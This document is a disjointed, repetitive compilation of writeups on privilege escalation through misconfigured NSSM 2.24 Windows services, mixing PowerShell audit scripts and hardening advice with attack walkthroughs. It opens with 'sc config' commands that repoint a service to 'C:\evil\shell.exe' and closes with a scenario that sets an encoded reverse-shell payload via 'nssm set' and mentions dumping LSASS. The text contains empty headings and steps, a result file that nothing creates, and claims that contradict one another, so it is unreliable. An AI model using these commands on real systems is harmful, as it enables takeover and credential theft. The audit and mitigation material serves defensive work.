Assumptions:
Steps to escalate:
    # As standard user bob
    sc qc vuln_svc
    :: Output shows SERVICE_CHANGE_CONFIG permission present.
    sc config vuln_svc binPath= "C:\evil\shell.exe"
    sc stop vuln_svc
    sc start vuln_svc
shell.exe runs as SYSTEM.
An authenticated, low-privileged user can achieve full SYSTEM privileges on the affected host. This compromises integrity, confidentiality, and availability.
# Find NSSM services
Get-WmiObject win32_service | Where-Object { $_.PathName -like "*nssm*" } | Format-Table Name, StartName, PathName
Newer versions of NSSM (2.24 is the last stable release as of 2016; no official updates after) do not address these privilege escalation vectors. However, the problem is less a bug in NSSM than a matter of administrative practice combined with NSSM's lack of built-in security hardening. Attackers target version 2.24 because:
Registry ACL Hardening
Restrict write access to the service parameters registry key for non-admin users:
    regini.exe nssm_acl.txt
(Where nssm_acl.txt contains the hardened permissions.)
Application Control
Use AppLocker or WDAC to block older versions of NSSM (hash-based rule for version 2.24).
Service Permission Review
Audit all services with sc sdshow <ServiceName>. Ensure that INTERACTIVE or BUILTIN\Users does not have RPWP (start/write) permissions.
Monitoring
Create a SIEM alert for:
NSSM (Non-Sucking Service Manager) version 2.24 is susceptible to a privilege escalation vulnerability specifically related to its service configuration and the lack of quote marks in service binary paths.
While "Write" is not a specific named feature within the tool itself, the vulnerability typically involves an attacker gaining write access to a directory where a service is installed or leveraging weak permissions on the NSSM executable itself to redirect service execution to a malicious payload.
Privilege Escalation Mechanism
The primary method for escalating privileges via NSSM 2.24 involves unquoted service paths. If an administrator installs a service using NSSM and the path to the executable contains spaces but no quotation marks (e.g., C:\Program Files\Service Name\nssm.exe), Windows will search for and attempt to execute files in the following order:
    C:\Program.exe
    C:\Program Files\Service.exe
    C:\Program Files\Service Name\nssm.exe
If a low-privileged user has write permissions to C:\, they can place a malicious Program.exe there. When the system restarts or the service is triggered, it will run the malicious file with SYSTEM privileges.
Vulnerability Breakdown
Arbitrary File Write/Overwrite: Attackers look for instances where NSSM has been configured with weak file permissions. If a user can overwrite nssm.exe or its configuration in the Registry (located at HKLM\System\CurrentControlSet\Services\<ServiceName>\Parameters), they can point the service to a malicious script.
Registry Modification: NSSM stores its service parameters in the Registry. If the permissions on these Registry keys are too loose, a user can modify the AppParameters or Application string to execute a different command when the service starts.
Version Specifics: Version 2.24 is the most widely cited version in security advisories because it was the stable release for a long period during which these configuration-based exploits were popularized in penetration testing frameworks.
Mitigation Strategies
To prevent privilege escalation when using NSSM, you should follow these security best practices:
Quote Service Paths: Always ensure the path to nssm.exe and the application it manages are enclosed in double quotes within the service configuration.
Restrict Permissions: Ensure that only administrators have "Write" or "Modify" permissions on the directory where nssm.exe is located and the Registry keys associated with the service.
Update to Latest: While NSSM development is infrequent, ensure you are using the most stable version and audit the service creation process for common Windows misconfigurations.
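The following audit script is an added example, not code from the page or from the NSSM project. It checks every installed service for the weaknesses described above: an unquoted binary path (and whether the directories Windows would search first, such as C:\ and C:\Program Files, are writable by standard users), write access for standard users on the service binary, its directory, or its Parameters registry key, and nssm.exe running from outside Program Files. It assumes Windows PowerShell 5.1 or later in an elevated session so that every ACL can be read; the function names Get-HijackDirectories, Test-LowPrivWrite and Get-ServiceFindings and the identity/rights lists are this example's own choices.

```powershell
# Added example (not from the page or the NSSM project): audit services for unquoted
# paths and for write access held by standard users. Run elevated on the host.

# Identities a standard, non-administrative user normally belongs to (assumption).
$LowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace a file (or a value under a key) or rewrite its ACL.
$FileWriteBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$RegWriteBits  = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'

function Get-HijackDirectories {
    # For an unquoted PathName such as C:\Program Files\Service Name\nssm.exe, return the
    # directories Windows consults before the real binary: C:\ and C:\Program Files.
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.TrimStart().StartsWith('"')) { return @() }   # quoted path: not affected
    $tokens = $PathName.Trim() -split ' '
    $dirs   = @()
    $prefix = $tokens[0]
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        if ($prefix -match '\.exe$') { break }             # reached the executable; the rest are arguments
        $dirs  += Split-Path -Parent ($prefix + '.exe')    # Windows would try "<prefix>.exe" at this break
        $prefix = "$prefix $($tokens[$i])"
    }
    return @($dirs | Select-Object -Unique)
}

function Test-LowPrivWrite {
    # True when one of $LowPrivIdentities holds an Allow ACE with write-class rights on a
    # file, directory or registry key (HKLM:\... paths are accepted by Get-Acl).
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if ($ace -is [System.Security.AccessControl.FileSystemAccessRule]) {
            $rights = [int]$ace.FileSystemRights; $mask = [int]$FileWriteBits
        } elseif ($ace -is [System.Security.AccessControl.RegistryAccessRule]) {
            $rights = [int]$ace.RegistryRights;   $mask = [int]$RegWriteBits
        } else { continue }
        if (($rights -band $mask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceFindings {
    # One object per service that shows at least one of the weaknesses discussed above.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $pathName = $svc.PathName
        if (-not $pathName) { continue }
        # The executable: the quoted part if quotes are present, otherwise up to the first .exe.
        $exe = if ($pathName -match '^\s*"([^"]+)"') { $Matches[1] }
               elseif ($pathName -match '^(.*?\.exe)') { $Matches[1] }
               else { ($pathName -split ' ')[0] }
        $issues = @()
        foreach ($dir in Get-HijackDirectories $pathName) {
            $state   = if (Test-LowPrivWrite $dir) { 'IS writable' } else { 'is not writable' }
            $issues += "unquoted path; search directory $dir $state by standard users"
        }
        $exeDir = Split-Path -Parent $exe
        if (Test-LowPrivWrite $exe)    { $issues += "standard users can modify binary $exe" }
        if (Test-LowPrivWrite $exeDir) { $issues += "standard users can write to directory $exeDir" }
        $paramKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)\Parameters"
        if (Test-LowPrivWrite $paramKey) { $issues += "standard users can write $paramKey" }
        if ($exe -match 'nssm\.exe$' -and $exe -notmatch '^[A-Za-z]:\\Program Files') {
            $issues += "nssm.exe outside Program Files: $exe"
        }
        if ($issues.Count -gt 0) {
            [pscustomobject]@{ Service = $svc.Name; Account = $svc.StartName; Path = $pathName; Issues = ($issues -join '; ') }
        }
    }
}

Get-ServiceFindings | Format-Table -AutoSize -Wrap
```

A service that appears with both an unquoted path and a writable search directory, or with a writable Parameters key, is the configuration the preceding sections describe; fixing it means quoting the path (sc config with a quoted binPath) and removing the offending ACE, then re-running the audit to confirm the finding disappears.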
Non-Sucking Service Manager (NSSM) version 2.24 does not have a unique, built-in "exploit" or CVE inherent to its code. Instead, privilege escalation involving NSSM almost always stems from insecure deployment configurations. Because NSSM is an executable used to wrap other applications as services, it is a high-value target for attackers who have already gained a foothold on a system.
Primary Escalation Vectors
When NSSM 2.24 is present, it is usually targeted via three common Windows service misconfigurations:
The Non-Sucking Service Manager (NSSM) 2.24 is a popular tool for running any application as a Windows service. While the tool itself is not inherently malicious, it is frequently exploited for Local Privilege Escalation (LPE) due to misconfigurations or unquoted service paths.
Core Vulnerability: Unquoted Service Paths
The most common privilege escalation involving NSSM 2.24 stems from "Unquoted Service Paths".
The Flaw: If a service path contains spaces (e.g., C:\Program Files\NSSM\nssm.exe) and is not enclosed in double quotes, Windows will look for executables at every break.
The Attack: An attacker can place a malicious program.exe in C:\ or nssm.exe in C:\Program Files\. When the service restarts, Windows may execute the attacker's file instead of the intended one, granting SYSTEM privileges.
Exploitation in the Wild
NSSM is a "dual-use" tool often leveraged by advanced threat groups for persistence and elevated access:
Akira Ransomware: Used nssm-2.24 to create malicious services (like sysmon) to launch tunneling tools like Ngrok.
Head Mare & Twelve: Used NSSM to make traffic tunneling tools (e.g., Localtonet) persistent on compromised business automation servers.
Pelco VideoXpert: A known advisory (ZSL-2017-5418) highlighted how NSSM 2.24 in this software suite allowed non-privileged users to execute arbitrary code by replacing binaries in writable paths.
Key Technical Details
Vulnerable Version: NSSM 2.24 (often bundled with third-party software)
Common Path: C:\ProgramData\... or C:\Program Files\... with weak permissions
Impact: Full system takeover (Vertical Privilege Escalation)
Detection: EDR alerts for nssm.exe in unusual paths like \Windows\tmp\
Prevention & Mitigation
Quote Service Paths: Ensure all service binary paths are wrapped in double quotes.
Strict Permissions: Restrict write access for standard users on directories containing service executables.
Audit Services: Use sc qc [ServiceName] to check for unquoted paths or insecure binary locations.
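The "Service Permission Review" item above says to run sc sdshow on every service and make sure INTERACTIVE or BUILTIN\Users hold no start/write rights; the following is an added example (not code from the page or the NSSM project) that parses the SDDL string sc sdshow prints and reports such ACEs, so the output from many hosts can be reviewed offline. It assumes Windows PowerShell 5.1 or later; the two-letter right and SID abbreviations are the documented SDDL ones, the function name Get-ServiceSddlFindings and the risk grouping are this example's own, and the sample SDDL at the bottom is constructed for illustration.

```powershell
# Added example (not from the page or the NSSM project): flag weak ACEs in a service DACL.

# Service access-right abbreviations as they appear in service SDDL strings.
$RightNames = @{
    CC = 'QUERY_CONFIG'; DC = 'CHANGE_CONFIG'; LC = 'QUERY_STATUS'; SW = 'ENUMERATE_DEPENDENTS'
    RP = 'START'; WP = 'STOP'; DT = 'PAUSE_CONTINUE'; LO = 'INTERROGATE'; CR = 'USER_DEFINED_CONTROL'
    SD = 'DELETE'; RC = 'READ_CONTROL'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL'; GW = 'GENERIC_WRITE'; GR = 'GENERIC_READ'; GX = 'GENERIC_EXECUTE'
}
# Well-known SID abbreviations that every local user (or anyone at all) maps to.
$LowPrivSids = @{
    WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'
    IU = 'INTERACTIVE'; BG = 'BUILTIN\Guests'; AN = 'ANONYMOUS'
}
# Risk grouping (this example's own): HIGH lets the principal rewrite the service
# configuration, ACL or owner; MEDIUM lets it restart the service, which is what runs a
# planted binary after a path or permission hijack.
$HighRisk   = @('DC', 'WD', 'WO', 'SD', 'GA', 'GW')
$MediumRisk = @('RP', 'WP')

function Get-ServiceSddlFindings {
    param([Parameter(Mandatory)][string]$Sddl)
    # Keep only the DACL: from "D:" up to the SACL marker "S:" (or end of string).
    if ($Sddl -match 'D:(?<dacl>.*?)(S:|$)') { $dacl = $Matches['dacl'] } else { throw 'No DACL found in SDDL string' }
    # ACE layout: (type;flags;rights;object_guid;inherit_object_guid;sid)
    $aces = [regex]::Matches($dacl, '\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)')
    foreach ($m in $aces) {
        $type = $m.Groups[1].Value; $rights = $m.Groups[3].Value; $sid = $m.Groups[6].Value
        if ($type -ne 'A') { continue }                       # only Allow ACEs grant access
        if (-not $LowPrivSids.ContainsKey($sid)) { continue } # admins/system/services are expected here
        # Rights are a run of two-letter tokens; a raw hex mask is reported unexpanded.
        $tokens = if ($rights -match '^0x') { @($rights) }
                  else { for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) } }
        $high   = @($tokens | Where-Object { $HighRisk   -contains $_ })
        $medium = @($tokens | Where-Object { $MediumRisk -contains $_ })
        if ($high.Count -eq 0 -and $medium.Count -eq 0) { continue }
        $severity = if ($high.Count -gt 0) { 'HIGH' } else { 'MEDIUM' }
        [pscustomobject]@{
            Principal = $LowPrivSids[$sid]
            Severity  = $severity
            Rights    = ((@($high) + @($medium)) | ForEach-Object { "$_ ($($RightNames[$_]))" }) -join ', '
        }
    }
}

# Constructed sample: the usual default service DACL plus one weak ACE that gives
# BUILTIN\Users CHANGE_CONFIG, START and STOP. Only that ACE should be reported.
$SampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
              '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPLOCRRC;;;BU)' +
              'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'

Get-ServiceSddlFindings -Sddl $SampleSddl | Format-Table -AutoSize
# Against a live service (sc.exe prints a blank line before the SDDL):
#   Get-ServiceSddlFindings -Sddl ((sc.exe sdshow vuln_svc | Where-Object { $_ }) -join '')
```

For the constructed sample the only finding is BUILTIN\Users at severity HIGH with DC (CHANGE_CONFIG), RP (START), WP (STOP); the INTERACTIVE ACE is left alone because query/interrogate rights do not let a user change what the service runs. A DC grant to any of the listed principals is exactly what the sc config binPath= step at the top of the page relies on.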
For NSSM 2.24, a critical feature to address privilege escalation vulnerabilities is a Permission Integrity Check & Lockdown module.
This feature focuses on mitigating the primary way attackers exploit NSSM: replacing the nssm.exe binary or its associated application executable due to insecure file permissions.
Key Components of the "Secure Lockdown" Feature
Automated Permission Audit: Upon service installation or startup, NSSM should scan its own binary path and the target application path. It would flag if high-risk groups (e.g., "Everyone," "Users," or "Authenticated Users") have Write or Full Control permissions.
Mandatory Quoted Paths: The tool should automatically enforce quoted service paths in the Windows registry to prevent "Unquoted Service Path" exploits, where Windows might execute a malicious binary with a similar name in a parent folder.
Binary Hash Verification: A feature that allows administrators to register a SHA-256 hash of the legitimate application executable. NSSM would verify this hash before every launch; if the binary has been replaced (a common privilege escalation tactic), NSSM would refuse to start the service.
"Least Privilege" Mode: A toggle to ensure the service defaults to a virtual account or a low-privileged user instead of the "LocalSystem" account, which is the most frequent target for attackers looking for administrative control.
Why this is needed
NSSM 2.24 is frequently cited in security advisories because third-party installers (like CouchDB or Wowza Streaming Engine) often deploy it with weak directory permissions. Because NSSM typically runs with SYSTEM privileges, any user who can replace the nssm.exe file can effectively take over the entire machine.
NSSM version 2.24 is vulnerable to local privilege escalation when installed with insecure file permissions, allowing low-privileged users to replace the executable and run malicious code as SYSTEM. The vulnerability stems from Weak Service Permissions where attackers modify the service binary path, requiring remediation via strict Access Control List (ACL) configuration on the executable directories. For more information, visit the official nssm.cc documentation.
The "Non-Sucking Service Manager" (NSSM) version 2.24 is frequently featured in cybersecurity "stories" or labs because it is a textbook example of how a helpful administrative tool can be turned into a vehicle for Local Privilege Escalation (LPE) on Windows systems.
The Core Vulnerability
NSSM itself is not inherently "malicious," but it is often misconfigured by software installers, leading to two common privilege escalation paths: Weak File Permissions (CVE-2016-8742):
The Scenario: A program (like Apache CouchDB) installs NSSM 2.24 into a directory where regular users have "Write" or "Modify" permissions.
The "Story": An attacker with low-level access replaces the nssm.exe binary with a malicious file (e.g., a reverse shell). Because NSSM usually runs as the LocalSystem account, the next time the service restarts, the attacker's code executes with full administrative power.
Unquoted Service Paths:
The Scenario: NSSM is registered as a service with a path like C:\Program Files\My App\nssm.exe but without quotation marks.
The "Story": Windows interprets the space in "Program Files" as a potential break. If an attacker can place a file named Program.exe in the C:\ root, Windows will execute it instead of the intended NSSM binary during the next boot, granting the attacker SYSTEM privileges.
Why NSSM 2.24 specifically?
Widespread Legacy Use: Version 2.24 was released in 2014 and remains the standard "stable" version bundled with many older applications.
Common in CTFs: Due to its known behavior and role in historical vulnerabilities (like the Odoo or CouchDB exploits), it is a favorite for Capture The Flag (CTF) challenges and penetration testing certifications.
Known Bugs: Official documentation for 2.24 notes that it may fail or loop if run without sufficient rights, ironically highlighting its deep integration with system privileges.
Mitigation Strategies
To prevent these scenarios, security professionals recommend:
Principle of Least Privilege: Ensure the directory containing nssm.exe is only writable by Administrators or the TrustedInstaller.
Quote Your Paths: Always wrap service paths in double quotes to prevent unquoted path attacks.
Regular Audits: Use tools like icacls to verify that the "Users" group does not have "Full Control" over service binaries.
Assume an attacker has gained initial access to a Windows 10 or Windows Server 2016 machine as a low-privileged user (e.g., via a phishing email or a vulnerable web app).
Step 1: Reconnaissance
The attacker runs:
    where nssm
Or checks installed versions:
    nssm version
If the output says 2.24, the system is vulnerable.
Step 2: Enumerate Existing NSSM Services
    wmic service where "pathname like '%nssm%'" get name, pathname
Or check the registry directly:
    reg query HKLM\SYSTEM\CurrentControlSet\Services /s /f "ImagePath" | findstr /i "nssm"
Step 3: Modify an Existing Service (Sneaky Method)
If a service named LegacyApp exists and is managed by NSSM 2.24, the attacker can simply modify its parameters without needing admin rights (due to the broken ACL or design flaw in that version):
    nssm set LegacyApp AppParameters "C:\Windows\System32\cmd.exe /c powershell -enc <base64 reverse shell>"
Step 4: Trigger Execution
Step 5: Post-Exploitation
The payload runs as SYSTEM. The attacker now has a high-integrity shell, can dump LSASS for credentials, move laterally, or disable security tools.
    type C:\ProgramData\poc.txt
On a vulnerable system, this file will be created by SYSTEM. On a patched system, NSSM will reject the change due to validation errors.